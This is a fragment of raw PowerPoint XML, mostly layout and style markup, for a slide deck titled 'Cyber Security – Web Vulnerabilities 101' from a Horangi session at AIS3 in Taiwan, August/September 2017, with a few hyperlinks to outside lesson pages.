                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lora"/>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445025"/>
            <a:ext cx="8520600" cy="5727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09" name="Shape 309"/>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10" name="Shape 310"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472457" y="4663216"/>
            <a:ext cx="548700" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="ko"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="k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_Section Header">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0"/>
            <a:ext cx="8153399" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="32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457200" y="1441446"/>
            <a:ext cx="3975099" cy="1562102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="10000" b="1"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 name="Shape 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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2016 Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3003550"/>
            <a:ext cx="3975098" cy="831850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="18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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711700" y="1441446"/>
            <a:ext cx="3975099" cy="1562102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="10000" b="1"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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4981576" y="3003550"/>
            <a:ext cx="3435348" cy="831850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="18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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Shape 41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1441446"/>
            <a:ext cx="0" cy="2393953"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="752075"/>
            <a:ext cx="8229600" cy="498872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lora"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lor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752075"/>
            <a:ext cx="8229600" cy="498872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lora"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lor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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1250946"/>
            <a:ext cx="8229600" cy="2216151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="14000" b="1"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Shape 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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2016 Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320925" y="3467100"/>
            <a:ext cx="4502150" cy="831850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>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0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3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ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="2895600" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>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sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="4767262"/>
            <a:ext cx="2133599"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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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5" name="Shape 155"/>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152400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3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156" name="Shape 156"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="2895600" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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None/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Shape 157"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="4767262"/>
            <a:ext cx="2133599" cy="273843"/>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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lora"/>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57200" y="205979"/>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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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65" name="Shape 165"/>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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-107950" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2" indent="-76200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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Shape 166"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="2895600" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>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sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="4767262"/>
            <a:ext cx="2133600" cy="2739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ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lora"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483681" r:id="rId1"/>
    <p:sldLayoutId id="2147483683" r:id="rId2"/>
    <p:sldLayoutId id="2147483684" r:id="rId3"/>
    <p:sldLayoutId id="2147483685" r:id="rId4"/>
    <p:sldLayoutId id="2147483686" r:id="rId5"/>
    <p:sldLayoutId id="2147483687"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hyperlink" Target="https://drive.google.com/file/d/0BxrOp54tcTS9dDV4bkRCZFh4bTg/view"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4.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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/commen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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://computersecuritystudent.com/SECURITY_TOOLS/beebox/v2.2/lesson1/index.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34.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34.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34.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.7xter.com/2015/08/hacking-facebook-pages.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34.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/psiphon/landing-page-redirect/redirect.html?landingPage=https://google.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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout34.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9.xml"/><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34.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8.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316" name="Shape 316"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1657350"/>
            <a:ext cx="8595300" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B45F06"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Cyber Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="3600" dirty="0">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Web V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="3600" dirty="0">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>ulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="3600" dirty="0">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> 101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="3600" dirty="0">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 317"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4389120"/>
            <a:ext cx="8229600" cy="256222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>August/Sept 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>AIS3 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0" err="1">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Horangi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Taiwan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="318" name="Shape 318"/>
